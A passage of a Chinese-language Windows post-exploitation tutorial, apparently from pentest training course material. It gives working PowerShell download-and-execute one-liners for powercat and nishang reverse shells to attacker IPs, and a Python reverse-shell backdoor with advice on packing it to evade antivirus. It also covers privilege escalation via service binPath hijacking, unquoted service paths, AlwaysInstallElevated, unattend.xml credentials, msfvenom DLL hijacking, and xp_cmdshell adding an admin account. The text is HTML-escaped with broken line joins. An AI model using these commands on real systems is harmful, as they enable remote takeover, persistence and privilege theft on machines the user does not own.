           powershell IEX (New-Object\nSystem.Net.Webclient).DownloadString('https:\/\/raw.githubusercontent.com\/besimorhino\/powercat\/master\/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd<\/code><\/pre>\n
          \u8fd9\u4e2a\u7f51 \u9ed8\u8ba4\u662f\u88ab\u5899\u7684\uff0c\u6240\u4ee5\u53ef\u4ee5\u653e\u5728\u53ef\u88ab\u8bbf\u95ee\u7684\u8fdc\u7a0b\u670d\u52a1\u5668\u4e0a\u3002\u6267\u884c\u547d\u4ee4\u7684\u65f6\u5019\uff0c\u81ea\u52a8\u4e0b\u8f7d\u6267\u884c<\/p>\n
          \u653b\u51fb\u8005\u76d1\u542c nc -lvnp 8888<\/p>\n
          \u5728webshell\u4e0a\u6267\u884c \u547d\u4ee4<\/p>\n
          powershell IEX (New-Object\nSystem.Net.Webclient).DownloadString('http:\/\/192.168.0.195\/powercat.ps1');\npowercat -c 192.168.0.195 -p 8888 -e cmd<\/code><\/pre>\n
          \"1746601054287-da14b0b1-59c6-4542-bf8a-b13c148e123c.png\"<\/p>\n
          nishang\u53cd\u5f39shell<\/h3>\n
          nishanghttps:\/\/github.com\/samratashok\/nishang<\/a><\/p>\n
          \u4e00\u4e2a\u57fa\u4e8ePowerShell\u7684\u653b\u51fb\u6846\u67b6\uff0c\u96c6\u5408\u4e86\u4e00\u4e9bPowerShell\u653b\u51fb\u811a\u672c\u548c\u6709\u6548\u8f7d\u8377\uff0c\u53ef\u53cd\u5f39TCP\/ UDP\/ HTTP\/HTTPS\/ ICMP\u7b49\u7c7b\u578bshell<\/p>\n
          Reverse TCP shell<\/strong><\/p>\n
          \u653b\u51fb\u8005(192.168.0.195)\u5f00\u542f\u76d1\u542c\uff1a<\/p>\n
          \u76ee\u6807\u673a\u6267\u884c<\/p>\n
          powershell IEX (New-Object\nNet.WebClient).DownloadString('https:\/\/raw.githubusercontent.com\n\/samratashok\/nishang\/9a3c747bcf535ef82dc4c5c66aac36db47c2afde\/Shells\/Invoke-\nPowerShellTcp.ps1');\nInvoke-PowerShellTcp -Reverse -IPAddress 192.168.159.134 -port 6666<\/code><\/pre>\n
          \u6216\u8005\u5728\u81ea\u5df1\u7684\u670d\u52a1\u4e0a\u642d\u5efa\u4e0b\u8f7d<\/p>\n
          powershell IEX (New-Object\nNet.WebClient).DownloadString('http:\/\/192.168.0.195\/nishang\/Shells\/Invoke-\nPowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.0.195 -port\n6666<\/code><\/pre>\n
          \"1746601136288-def1f47b-de59-4a89-af67-bafbb1f1e20d.png\"<\/p>\n
          Reverse UDP shell<\/strong><\/p>\n
          \u653b\u51fb\u8005\u76d1\u542c nc -lvup 53<\/p>\n
          \u63a7\u5236\u7aef\u6267\u884c<\/p>\n
          powershell IEX (New-Object\nNet.WebClient).DownloadString('http:\/\/192.168.0.195\/nishang\/Shells\/Invoke-\nPowerShellUdp.ps1');\nInvoke-PowerShellUdp -Reverse -IPAddress 192.168.0.195 -port 53<\/code><\/pre>\n
          \"1746601169105-bfdff3f1-6905-4238-934f-faf736fd1f60.png\"<\/p>\n
          python\u53cd\u5f39cmd shell<\/strong><\/p>\n
          \u4f7f\u7528python\u7f16\u5199\u53cd\u5f39shell\uff0c\u5982\u679c\u76ee\u6807\u652f\u6301python3\u53ef\u4ee5\u811a\u672c\u76f4\u63a5\u6267\u884c\u5373\u53ef<\/p>\n
          \u5982\u679c\u9047\u5230 \u6740\u8f6f \u53ef\u4ee5\u4f7f\u7528 \u751f\u6210exe\u7684\u7248\u672c \u53ef\u4ee5\u5f88\u597d\u7684\u9003\u9038\u6740\u8f6f<\/p>\n
          import asyncio\nimport socket\nimport argparse\nparser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,\ndescription=\"############### pycat\n###############n\" \n\" Windows Reverse TCP\nbackdoorn\"\n\"Usage: python pycat.py --host\nnetcatIP --port PORTnn\" \n\"Demo: youtube.com\/watch?\nv=3sMhHL6c68En\"\n\"GitHub:\ngithub.com\/danielhnmoreno\/pycatn\" \n\"Contact: contato@bluesafe.com.br\")\nparser.add_argument('--host', action = 'store', dest = 'host', required = True,\nhelp = 'Host listening for reverse connection')\nparser.add_argument('--port', action = 'store', type=int, dest = 'port', required\n= True, help = 'Port')\narguments = parser.parse_args()\nHOST = arguments.host\nPORT = arguments.port\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\nasync def shell():\nwhile 1:\nproc = await asyncio.create_subprocess_shell(\"cmd\",\nstdin=asyncio.subprocess.PIPE,\nstdout=asyncio.subprocess.PIPE,\nstderr=asyncio.subprocess.STDOUT)\ncmd = b\"n\"\nproc.stdin.write(cmd)\nwhile 1:\nwhile 1:\nout = await proc.stdout.readline()\nbreak_ = out.decode(\"latin-1\")\nif break_[-2:] == \">n\" or break_[-3:] == \"> n\":\ns.send(out[:-1])\nbreak\nelif break_.endswith(\">\" + cmd.decode()) or break_.endswith(\"> \"\n+ cmd.decode()):\npass\nelse:\ns.send(out)\n        cmd = s.recv(1024)\ncmd_ = cmd.decode()\nif cmd_ == \"n\":\nproc.stdin.write(b\"n\")\nelif cmd_.startswith(\"exit\"):\nproc.terminate()\nbreak\nelse:\nproc.stdin.write(cmd + b\"n\")\nasyncio.set_event_loop_policy(asyncio.WindowsProactorEventLoopPolicy())\nasyncio.run(shell())<\/code><\/pre>\n
          \u76ee\u6807\u4e0a\u6ca1\u6709\u5b89\u88c5python \u53ef\u4ee5\u4f7f\u7528\u547d\u4ee4\u6253\u5305\u6210exe\u5728\u4e0a\u4f20\u6267\u884c<\/p>\n
          pyinstaller -Fw pycat.py<\/p>\n
          \u653b\u51fb\u8005\u76d1\u542c nc -lvp 6666<\/p>\n
          \u88ab\u63a7\u7aef \u6267\u884c<\/p>\n
          \/c C:WindowsdebugWIApycat.exe –host 192.168.0.195 –port 6666<\/p>\n
          \"1746601264031-40b78ee3-a4cd-44b7-bed6-a754aaa38ed2.png\"<\/p>\n
          Windows \u7cfb\u7edf\u914d\u7f6e\u9519\u8bef\u63d0\u6743<\/h2>\n
          \u7cfb\u7edf\u670d\u52a1\u6743\u9650\u914d\u7f6e\u9519\u8bef<\/h3>\n
          \u63cf\u8ff0<\/strong><\/p>\n
          Windows\u5728\u7cfb\u7edf\u542f\u52a8\u65f6\uff0c\u4f1a\u4f34\u968f\u7740\u4e00\u4e9b\u9ad8\u6743\u670d\u52a1\u542f\u52a8(windows\u670d\u52a1\u662f\u4ee5system\u6743\u9650\u8fd0\u884c\u7684)\u5018\u82e5\u67d0\u4e9b\u670d\u52a1\u5b58\u5728\u4e00\u4e9b\u6f0f\u6d1e\uff0c\u90a3\u4e48\u5c31\u80fd\u591f\u501f\u6b64\u670d\u52a1\u8fdb\u884c\u6743\u9650\u52ab\u6301\uff0c\u4f8b\u5982DLL\u52ab\u6301<\/p>\n
          \u6f0f\u6d1e\u4ecb\u7ecd<\/strong><\/p>\n
          windows\u7cfb\u7edf\u670d\u52a1\u6587\u4ef6\u5728\u64cd\u4f5c\u7cfb\u7edf\u542f\u52a8\u65f6\u52a0\u8f7d\u6267\u884c\uff0c\u5e76\u5728\u540e\u53f0\u8c03\u7528\u53ef\u6267\u884c\u6587\u4ef6\u3002\u5982\u679c\u4e00\u4e2a\u4f4e\u6743\u9650\u7684\u7528\u6237\u5bf9\u6b64\u7c7b\u7cfb\u7edf\u670d\u52a1\u8c03\u7528\u7684\u53ef\u6267\u884c\u6587\u4ef6\u62e5\u6709\u5199\u6743\u9650\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u66ff\u6362\u8be5\u6587\u4ef6\uff0c\u5e76\u968f\u7740\u7cfb\u7edf\u542f\u52a8\u83b7\u5f97\u63a7\u5236\u6743\u9650\u3002<\/p>\n
          windows\u670d\u52a1\u662f\u4ee5system\u6743\u9650\u8fd0\u884c\u7684\uff0c\u5176\u6587\u4ef6\u5939\u3001\u6587\u4ef6\u548c\u6ce8\u518c\u8868key-value\u90fd\u662f\u53d7\u5f3a\u5236\u8bbf\u95ee\u63a7\u5236\u4fdd\u62a4\u7684\u3002\u4f46\u662f\u5728\u67d0\u4e9b\u60c5\u51b5\u4e0b\uff0c\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u4f9d\u7136\u5b58\u5728\u4e00\u4e9b\u6ca1\u6709\u5f97\u5230\u6709\u6548\u4fdd\u62a4\u7684\u670d\u52a1\u3002<\/p>\n
          \u590d\u73b0<\/strong><\/p>\n
          1\u3001Powershell\u4e2d\u7684PowerUp\u811a\u672c https:\/\/github.com\/HarmJ0y\/PowerUp<\/a> \u8f7d\u6a21\u5757\u5e76\u6267\u884c \u5217\u51fa\u53ef\u80fd\u5b58\u5728\u95ee\u9898\u7684\u6240\u6709\u670d\u52a1 \u5206\u6790\u80fd\u5426\u5229\u7528<\/p>\n
          powershell -nop -exec bypass -c \"IEX (New-Object\nNet.WebClient).DownloadString('http:\/\/192.168.0.106\/PowerUp.ps1'); Invoke-\nAllChecks\"<\/code><\/pre>\n
          \"1746601413065-acf87b83-b244-4406-addd-c64cba65c55f.png\"<\/p>\n
          2\u3001PrivescCheck\u8fd9\u4e2aPowershell\u6bd4PowerUp\u663e\u793a\u7684\u5185\u5bb9\u66f4\u52a0\u8be6\u7ec6\uff0cPowerUp\u957f\u671f\u6ca1\u66f4\u65b0\u4e86\uff0c\u5efa\u8bae\u7528\u8fd9\u4e2a\u5de5\u5177\u5bf9\u914d\u7f6e\u8fdb\u884c\u8be6\u7ec6\u9519\u8bef<\/p>\n
          git clone https:\/\/github.com\/itm4n\/PrivescCheck.git<\/a><\/p>\n
          powershell -nop -exec bypass -c \"IEX (New-Object\nNet.WebClient).DownloadString('http:\/\/192.168.0.106\/PrivescCheck.ps1'); Invoke-\nPrivescCheck\"<\/code><\/pre>\n
          \"1746601443074-4557a7be-11e8-43b2-bbbd-167a62348689.png\"<\/p>\n
          \"1746601450118-e911ce42-48ad-4132-a036-80d72971a044.png\"<\/p>\n
          NT AUTHORITYAuthenticated Users \u666e\u901a\u7528\u6237\u4e5f\u80fd\u8bbe\u7f6e\u6587\u4ef6<\/p>\n
          \u666e\u901a\u7528\u6237\u53ef\u4ee5\u5bf9usosvc\u670d\u52a1\u8fdb\u884c\u8bbe\u7f6e s.exe\u662fmsf\u7684\u540e\u95e8\u7a0b\u5e8f<\/p>\n
          sc stop UsoSvc\nsc config usosvc binPath= \"C:s.exe\"\nsc start UsoSvc<\/code><\/pre>\n
          3\u3001Metasploit\u4e2d\u7684\u653b\u51fb\u6a21\u5757 exploit\/windows\/local\/service_permissions<\/p>\n
          service_permissions\u6a21\u5757\u4f1a\u4f7f\u7528 \u4e24\u79cd\u65b9\u5f0f\u83b7\u53d6system\u6743\u9650 \u5982\u679c\u4ee5\u7ba1\u7406\u5458\u6743\u9650\u8fd0\u884c \u4f1a\u5c1d\u8bd5\u521b\u5efa\u5e76\u8fd0\u884c\u4e00\u4e2a\u65b0\u7684\u670d\u52a1 \u5982\u679c\u5f53\u524d\u6743\u9650\u4e0d\u5141\u8bb8\u521b\u5efa\u670d\u52a1 \u4f1a\u5224\u65ad\u54ea\u4e9b\u670d\u52a1\u7684\u6587\u4ef6\u6216\u6587\u4ef6\u5939\u7684\u6743\u9650\u6709\u95ee\u9898 \u5e76\u5bf9\u5176\u8fdb\u884c\u52ab\u6301 \u5728\u52ab\u6301\u670d\u52a1\u65f6\u4f1a\u521b\u5efa\u4e00\u4e2a\u53ef\u6267\u884c\u7a0b\u5e8f \u5176\u6587\u4ef6\u540d\u548c\u5b89\u88c5\u8def\u5f84\u90fd\u662f\u968f\u673a\u7684<\/p>\n
          \u4e0d\u5e26\u5f15\u53f7\u7684\u670d\u52a1\u8def\u5f84\u63d0\u6743<\/h3>\n
          \u63cf\u8ff0<\/strong><\/p>\n
          \u5f53\u7cfb\u7edf\u7ba1\u7406\u5458\u914d\u7f6eWindows\u670d\u52a1\u65f6\uff0c\u4ed6\u4eec\u5fc5\u987b\u6307\u5b9a\u8981\u6267\u884c\u7684\u547d\u4ee4\uff0c\u6216\u8005\u8fd0\u884c\u53ef\u6267\u884c\u6587\u4ef6\u7684\u8def\u5f84\u3002\u5f53Windows\u670d\u52a1\u8fd0\u884c\u65f6\uff0c\u4f1a\u53d1\u751f\u4ee5\u4e0b\u4e24\u79cd\u60c5\u51b5\u4e4b\u4e00\u3002\u5982\u679c\u7ed9\u51fa\u4e86\u53ef\u6267\u884c\u6587\u4ef6\uff0c\u5e76\u4e14\u5f15\u7528\u4e86\u5b8c\u6574\u8def\u5f84\uff0c\u5219\u7cfb\u7edf\u4f1a\u6309\u5b57\u9762\u89e3\u91ca\u5b83\u5e76\u6267\u884c\u3002\u4f46\u662f\uff0c\u5982\u679c\u670d\u52a1\u7684\u4e8c\u8fdb\u5236\u8def\u5f84\u672a\u5305\u542b\u5728\u5f15\u53f7\u4e2d\uff0c\u5219\u64cd\u4f5c\u7cfb\u7edf\u5c06\u4f1a\u6267\u884c\u627e\u5230\u7684\u7a7a\u683c\u5206\u9694\u7684\u670d\u52a1\u8def\u5f84\u7684\u7b2c\u4e00\u4e2a\u5b9e\u4f8b\u3002<\/p>\n
          \u539f\u7406<\/strong><\/p>\n
          using System;\nusing System.Collections.Generic;\nusing System.Text;\nnamespace moon\n{\nclass Program\n{\nstatic void Main(string[] args)\n{\nConsole.WriteLine(\"\u6b22\u8fce\u6765\u5230\u6697\u6708\u6e17\u900f\u6d4b\u8bd5\u57f9\u8bad\");\n}\n}\n}<\/code><\/pre>\n
          \u7f16\u8bd1\u6210exe \u7136\u540e\u6539\u540d\u4e0a\u4f20\u5230 c\u76d8 Program.exe<\/p>\n
          \u670d\u52a1\u5668\u6267\u884c\u7684\u65f6\u5019\u5982\u679c\u6ca1\u6709\u6dfb\u52a0\u53cc\u5f15\u53f7 \u7a0b\u5e8f\u662f\u8fd9\u6837\u5bfb\u627eRar.exe\u6587\u4ef6<\/p>\n
          1\u3001 \u6ca1\u6709\u53cc\u5f15\u53f7\u7684\u65f6\u5019\u4f1a\u6267\u884cProgram.exe\u6587\u4ef6<\/p>\n
          \"1746601708484-184a0fe0-bedc-40eb-9d1e-351c7477b9ba.png\"<\/p>\n
          2\u3001 \u6709\u53cc\u5f15\u53f7\u7684\u65f6\u5019<\/p>\n
          "C:Program FilesWinRARRar.exe"<\/p>\n
          \"1746601724923-57ecfd40-44c0-4fa2-8e5e-3f341330e737.png\"<\/p>\n
          \u6ca1\u6709\u53cc\u5f15\u53f7\u7684\u65f6\u5019\uff0cwindows\u4f1a\u628a\u7a7a\u683c\u524d\u9762\u7684\u5f53\u505aexe\u6587\u4ef6\u6267\u884c\u3002<\/p>\n
          \u6f0f\u6d1e\u590d\u73b0<\/strong><\/p>\n
          \u4f7f\u7528PowerUp.ps1\u8fdb\u884c\u68c0\u6d4b\uff0c\u4f1a\u904d\u5386\u51fa\u5e26\u6709\u7a7a\u683c\u7684\u6587\u4ef6\u8def\u5f84<\/p>\n
          powershell -nop -exec bypass -c \"IEX (New-Object\nNet.WebClient).DownloadString('http:\/\/192.168.0.106\/PowerUp.ps1'); Invoke-\nAllChecks\"<\/code><\/pre>\n
          \u6216\u8005\u4f7f\u7528\u547d\u4ee4<\/p>\n
          wmic service get name,displayname,pathname,startmode|findstr \/i \"Auto\" |findstr\n\/i \/v \"C:Windows\" |findstr\/i \/v \"\"\"<\/code><\/pre>\n
          \"1746601759022-2213c813-b65f-4b60-a464-77a254d468d1.png\"<\/p>\n
          \u770b\u5230\u670d\u52a1\u5668\u5b58\u5728\u7a7a\u683c\uff0c\u8def\u5f84\u53ef\u5199 \u5373\u5b58\u5728\u6f0f\u6d1e<\/p>\n
          \u5982\u679cC\u76d8\u53ef\u5199\u4e0a\u4f20\u53cd\u5f39\u540e\u95e8\u5230C:Program.exe\u5373\u53ef<\/p>\n
          \u7cfb\u7edf\u5728\u91cd\u542f \u83b7\u53d6\u7ba1\u7406\u5458\u91cd\u542f\u8be5\u670d\u52a1\u7684\u65f6\u5019\u5c31\u4f1a\u83b7\u53d6\u7cfb\u7edf\u6743\u9650<\/p>\n
          \u8bb0\u5f97\u5728\u8bbe\u7f6e metasploist set AutoRunScript migrate -f \u81ea\u52a8\u8fc1\u79fb\u8fdb\u7a0b \u4e0d\u7136\u4f1a\u8fde\u63a5\u5c31\u65ad\u5f00<\/p>\n
          \u6ce8\u518c\u952eAlwaysInstallElevated<\/h3>\n
          \u63cf\u8ff0<\/strong><\/p>\n
          \u5141\u8bb8\u4f4e\u6743\u9650\u7528\u6237\u4ee5System\u6743\u9650\u5b89\u88c5\u6587\u4ef6\u3002\u5982\u679c\u542f\u7528\u6b64\u7b56\u7565\u8bbe\u7f6e\u9879\uff0c\u90a3\u4e48\u4efb\u4f55\u6743\u9650\u7684\u7528\u6237\u90fd\u4ee5NTAuthoritySystem\u6743\u9650\u6765\u5b89\u88c5\u6076\u610f\u7684MSI\u6587\u4ef6\u3002 windows install\u662fwindows\u64cd\u4f5c\u7cfb\u7edf\u7684\u7ec4\u4ef6\u4e4b\u4e00\uff0c\u4e13\u95e8\u7528\u6765\u7ba1\u7406\u914d\u7f6e\u8f6f\u4ef6\u670d\u52a1\u3002\u5b83\u9664\u4e86\u662f\u4e00\u4e2a\u5b89\u88c5\u7a0b\u5e8f\uff0c\u8fd8\u7528\u4e8e\u7ba1\u7406\u8f6f\u4ef6\u7684\u5b89\u88c5\u3001\u7ec4\u4ef6\u7684\u6dfb\u52a0\u3001\u5220\u9664\u3001\u76d1\u89c6\u6587\u4ef6\u7684\u8fd8\u539f\u3001\u901a\u8fc7\u56de\u6eda\u8fdb\u884c\u707e\u96be\u6062\u590d\u3002windows install\u901a\u8fc7msiexec.exe\u5b89\u88c5MSI\u6587\u4ef6\uff0c\u53cc\u51fbMSI\u6587\u4ef6\u5c31\u4f1a\u8fd0\u884cmsiexec.exe\u3002 \u539f\u7406:\u662f\u56e0\u4e3a\u7528\u6237\u6253\u5f00\u4e86windows installer \u7279\u6743\u5b89\u88c5\u529f\u80fd<\/p>\n
          \u6f0f\u6d1e\u590d\u73b0<\/strong><\/p>\n
          \u8fd0\u884cgpedit.msc\u6253\u5f00\u7ec4\u7b56\u7565\u7f16\u8f91\u5668<\/p>\n
          \"1746601817818-fae6d43b-8614-43bf-b373-2dac0c396731.png\"<\/p>\n
          \"1746601823992-24815b26-7a77-4844-adcc-5105d18fea18.png\"<\/p>\n
          \u4e5f\u53ef\u4ee5\u4f7f\u7528\u547d\u4ee4\u884c\u4fee\u6539\u6ce8\u518c\u8868<\/p>\n
          reg add HKEY_CURRENT_USERSOFTWAREPoliciesMicrosoftWindowsInstaller \/v\nAlwaysInstallElevated \/t REG_DWORD \/d 1\nReg add HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller \/v\nAlwaysInstallElevated \/t REG_DWORD \/d 1<\/code><\/pre>\n
          \u4f7f\u7528PowerUp\u68c0\u6d4b\u6ce8\u518c\u8868\u662f\u5426\u6709\u8bbe\u7f6e \u5982\u679c\u8fd4\u56detrue\u8bc1\u660e\u53ef\u4ee5\u5229\u7528<\/p>\n
          \/c PowerShell -nop -exec bypass IEX(New-Object\nNet.WebClient).DownloadString('http:\/\/192.168.0.121\/PowerUp.ps1'); Get-\nRegAlwaysInstallElevated<\/code><\/pre>\n
          \"1746601849570-73c58c58-4318-40cc-adb6-57ff02601a52.png\"<\/p>\n
          iis_user\u7ec4\u7528\u6237\u6743\u9650\u8f83\u4f4e \u8fd4\u56defalse\"1746601858659-d28c711b-befe-4f3e-89b4-826213a03cf0.png\"<\/p>\n
          \u4e0a\u4f20 C:ProgramDataCOMahawk64.exe \u6267\u884c\u5373\u53ef\u83b7\u53d6\u4e00\u4e2a\u7cfb\u7edf\u5f97\u8d26\u53f7\u548c\u5bc6\u7801<\/p>\n
          \"1746601868283-8550449f-597f-4e0a-a137-cfa35564862c.png\"<\/p>\n
          \u6f0f\u6d1e\u4fee\u590d<\/strong><\/p>\n
          \u7981\u7528\u6ce8\u518c\u8868\u952eAlwaysInstallElevated<\/p>\n
          \u81ea\u52a8\u5b89\u88c5\u914d\u7f6e\u6587\u4ef6\u63d0\u6743<\/h3>\n
          \u63cf\u8ff0<\/strong><\/p>\n
          \u7f51\u7edc\u7ba1\u7406\u5458\u5728\u5185\u7f51\u4e2d\u7ed9\u591a\u53f0\u673a\u5668\u914d\u7f6e\u540c\u4e00\u4e2a\u73af\u5883\u7684\u65f6\u5019\uff0c\u4e00\u822c\u4f1a\u4f7f\u7528\u811a\u672c\u8fdb\u884c\u6279\u91cf\u90e8\u7f72\uff0c\u4e5f\u5c31\u662f\u4f1a\u4f7f\u7528\u5b89\u88c5\u914d\u7f6e\u6587\u4ef6\uff0c\u8fd9\u4e9b\u6587\u4ef6\u4e2d\u5305\u542b\u6240\u6709\u7684\u5b89\u88c5\u914d\u7f6e\u4fe1\u606f\uff0c\u5176\u4e2d\u8fd8\u6709\u4e00\u4e9b\u5305\u542b\u7740\u672c\u5730\u7ba1\u7406\u5458\u8d26\u53f7\u548c\u5bc6\u7801\u3002<\/p>\n
          \u6f0f\u6d1e\u590d\u73b0<\/strong><\/p>\n
          \u6211\u4eec\u6267\u884c\u5982\u4e0b\u547d\u4ee4\uff0c\u641c\u7d22Unattend.xml\u6587\u4ef6<\/p>\n
          dir \/b \/s c:Unattend.xml<\/p>\n
          \u8fd9\u91cc\u6211\u4eec\u7684Unattend.xml\u6587\u4ef6\u662f\u4f7f\u7528\u4e86base64\u5bf9\u7ba1\u7406\u5458\u7684\u5bc6\u7801\u8fdb\u884c\u7f16\u7801\u7684<\/p>\n
          \"1746601917529-32ef71cd-4517-422e-858c-75ba888bf92e.png\"<\/p>\n
          \u4e5f\u4f7f\u7528msf\u7684 post\/windows\/gather\/enum_unattend \u5bf9\u8fd9\u4e2a\u914d\u7f6e\u6587\u4ef6\u626b\u63cf<\/p>\n
          \u672c\u5730dll\u52ab\u6301\u63d0\u6743<\/h3>\n
          \u539f\u7406<\/strong><\/p>\n
          Windows\u7a0b\u5e8f\u542f\u52a8\u7684\u65f6\u5019\u9700\u8981DLL\u3002\u5982\u679c\u8fd9\u4e9bDLL \u4e0d\u5b58\u5728\uff0c\u5219\u53ef\u4ee5\u901a\u8fc7\u5728\u5e94\u7528\u7a0b\u5e8f\u8981\u67e5\u627e\u7684\u4f4d\u7f6e\u653e\u7f6e\u6076\u610fDLL\u6765\u63d0\u6743\u3002\u901a\u5e38\uff0cWindows\u5e94\u7528\u7a0b\u5e8f\u6709\u5176\u9884\u5b9a\u4e49\u597d\u7684\u641c\u7d22DLL\u7684\u8def\u5f84\uff0c\u5b83\u4f1a\u6839\u636e\u4e0b\u9762\u7684\u987a\u5e8f\u8fdb\u884c\u641c\u7d22\uff1a<\/p>\n
          :::color1
          \n1\u3001\u5e94\u7528\u7a0b\u5e8f\u52a0\u8f7d\u7684\u76ee\u5f55<\/p>\n
          2\u3001C:WindowsSystem32<\/p>\n
          3\u3001C:WindowsSystem<\/p>\n
          4\u3001C:Windows<\/p>\n
          5\u3001\u5f53\u524d\u5de5\u4f5c\u76ee\u5f55Current Working Directory\uff0cCWD<\/p>\n
          6\u3001\u5728PATH\u73af\u5883\u53d8\u91cf\u7684\u76ee\u5f55\uff08\u5148\u7cfb\u7edf\u540e\u7528\u6237\uff09<\/p>\n
          :::<\/p>\n
          \u8fd9\u6837\u7684\u52a0\u8f7d\u987a\u5e8f\u5f88\u5bb9\u6613\u5bfc\u81f4\u4e00\u4e2a\u7cfb\u7edfdll\u88ab\u52ab\u6301\uff0c\u56e0\u4e3a\u53ea\u8981\u653b\u51fb\u8005\u5c06\u76ee\u6807\u6587\u4ef6\u548c\u6076\u610fdll\u653e\u5728\u4e00\u8d77\u5373\u53ef,\u5bfc\u81f4\u6076\u610fdll\u5148\u4e8e\u7cfb\u7edfdll\u52a0\u8f7d\uff0c\u800c\u7cfb\u7edfdll\u662f\u975e\u5e38\u5e38\u89c1\u7684\uff0c\u6240\u4ee5\u5f53\u65f6\u57fa\u4e8e\u8fd9\u6837\u7684\u52a0\u8f7d\u987a\u5e8f\uff0c\u51fa\u73b0\u4e86\u5927\u91cf\u53d7\u5f71\u54cd\u8f6f\u4ef6<\/p>\n
          \u590d\u73b0<\/strong><\/p>\n
          \u7a0b\u5e8f\u8fd0\u884c\u4e00\u822c\u4f1a\u52a0\u8f7d\u7cfb\u7edfdll\u6216\u672c\u8eab\u7a0b\u5e8f\u81ea\u5e26\u7684dll\uff0c\u5982\u679c\u6211\u4eec\u5c06\u7a0b\u5e8f\u6267\u884c\u65f6\u9700\u8981\u52a0\u8f7d\u7684dll\u6587\u4ef6\u66ff\u6362\u6210\u6728\u9a6c\u7a0b\u5e8f\uff0c\u90a3\u4e48\u6211\u4eec\u4e0b\u6b21\u5728\u542f\u52a8\u7a0b\u5e8f\u65f6\u6240\u52a0\u8f7d\u7684dll\u5c31\u662f\u6211\u4eec\u66ff\u6362\u7684\u90a3\u4e2a\u6728\u9a6c\u7a0b\u5e8f\u4e86<\/p>\n
          1\u3001 \u6536\u96c6\u8fdb\u7a0b\u52a0\u8f7d\u7684dll<\/p>\n
          \u4f7f\u7528\u706b\u7ed2\u5251\u5206\u6790\u8be5\u8fdb\u7a0b\u6267\u884c\u65f6\u52a0\u8f7d\u4e86\u54ea\u4e9bdll<\/p>\n
          \"1746602001496-a5aa6f43-515e-450a-8d16-25ebde97f6b7.png\"<\/p>\n
          \u7cfb\u7edf\u6587\u4ef6\u4e00\u822c\u6211\u4eec\u662f\u66f4\u6539\u4e0d\u4e86\u7684\uff0c\u6240\u4ee5\u4e00\u822c\u9009\u62e9\u672a\u77e5\u6587\u4ef6\u548c\u6570\u5b57\u7b7e\u540d\u6587\u4ef6<\/p>\n
          msfvenom -p windows\/meterpreter\/reverse_tcp lhost=192.168.0.106 lport=12345 -f\ndll > libcurl_x86.dll<\/code><\/pre>\n
          \"1746602025645-a114e594-de94-4efe-9cc0-58811ce73ea5.png\"<\/p>\n
          \u66ff\u6362\u539f\u6765\u7684dll<\/p>\n
          \"1746602035797-18b71201-541b-44db-9a2d-17b52af2f56f.png\"\"1746602045628-dfd54088-82f8-45a2-8a2d-19ba80655ec5.png\"<\/p>\n
          \u7b2c\u4e09\u65b9\u63d0\u6743<\/h2>\n
          \u9664\u4e86\u7cfb\u7edf\u81ea\u5e26\u7684\u670d\u52a1\u5916 \uff0c\u5b89\u88c5\u7b2c\u4e09\u65b9\u7684\u8f6f\u4ef6\u4f8b\u5982 mysql sqlserver ftp\u7b49\u5e94\u7528\u8f6f\u4ef6\uff0c\u5982\u679c\u6743\u9650\u8bbe\u7f6e\u4e0d\u5bf9\uff0c\u4f1a\u5bf9\u670d\u52a1\u5668\u9020\u6210\u5b89\u5168\u9690\u60a3\uff0c\u4ece\u800c\u5bfc\u81f4\u670d\u52a1\u5668\u88ab\u63d0\u6743<\/p>\n
          sqlserver \u63d0\u6743<\/h3>\n
          \u63cf\u8ff0<\/strong><\/p>\n
          \u5982\u679c\u7f51\u7ad9\u91cc\u9762\u4f7f\u7528\u7684\u6570\u636e\u5e93\u662fsqlserver \u90a3\u4e48\u5982\u679c\u627e\u5230sa\u7684\u5bc6\u7801\uff0c\u5229\u7528\u63d0\u6743\u811a\u672c\uff0c\u6267\u884c\u547d\u4ee4\uff0c\u4f46\u662f\u4e0d\u4e00\u5b9a\u7684\u7cfb\u7edf\u6743\u9650\uff0c\u8fd8\u8981\u770b\u7ba1\u7406\u5458\u5f00\u59cb\u5b89\u88c5sqlserver\u7684\u6743\u9650\u8bbe\u7f6e \u4e00\u822c\u60c5\u51b5\u662fsystem\u6743\u9650\u6216\u8005pulic \u5747\u80fd\u6267\u884c\u547d\u4ee4<\/p>\n
          \u654f\u611f\u6587\u4ef6<\/strong><\/p>\n
          web.config<\/p>\n
          config.asp<\/p>\n
          conn.aspx<\/p>\n
          database.aspx<\/p>\n
          \u590d\u73b0<\/strong><\/p>\n
          \u4f7f\u7528mssql\u8fde\u63a5\u5de5\u5177\u6216\u8005webshell net\u63d0\u6743\u811a\u672c\u8f93\u5165\u8d26\u53f7\u548c\u5bc6\u7801\u8fde\u63a5<\/p>\n
          \u5f00\u542fxp_cmdshell<\/p>\n
          Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc\nDistributed Queries',1;RECONFIGURE;\nExec master.dbo.xp_cmdshell 'net user lx 123456 \/add & net localgroup\nadministrators lx \/add'\nExec master.dbo.xp_cmdshell 'systeminfo'<\/code><\/pre>\n
          \"1746602134457-1b99f77f-c20c-4a30-83a4-7421a6cc11f3.png\"<\/p>\n
          \u67e5\u770b\u5f53\u524d\u6743\u9650\u4e5f\u662f\u4e00\u4e2a\u666e\u901a\u7528\u6237\u3002\u53ef\u4ee5\u6267\u884c\u4e00\u4e9b\u57fa\u7840\u7684\u547d\u4ee4\uff0c\u53ef\u4ee5\u4e0a\u4f20\u6ea2\u51fa\u63d0\u6743\u5de5\u5177 \u518d\u6765\u63d0\u9ad8\u5f53\u524d\u7528\u6237\u7684\u6743\u9650\u3002 \u6709\u4e9b\u65f6\u5019 \u662f\u4e00\u4e2a\u7cfb\u7edf\u6743\u9650 \u4e3b\u8981\u8fd8\u662f\u8981\u770b\u76ee\u6807\u7ba1\u7406\u5458\u5728\u5f00\u59cb\u5b89\u88c5sqlserver\u7684\u65f6\u5019\u7ed9\u7684\u662f\u4ec0\u4e48\u6837\u7684\u6743\u9650<\/p>\n
          mysql\u63d0\u6743<\/h3>\n
          \u63cf\u8ff0<\/strong><\/p>\n
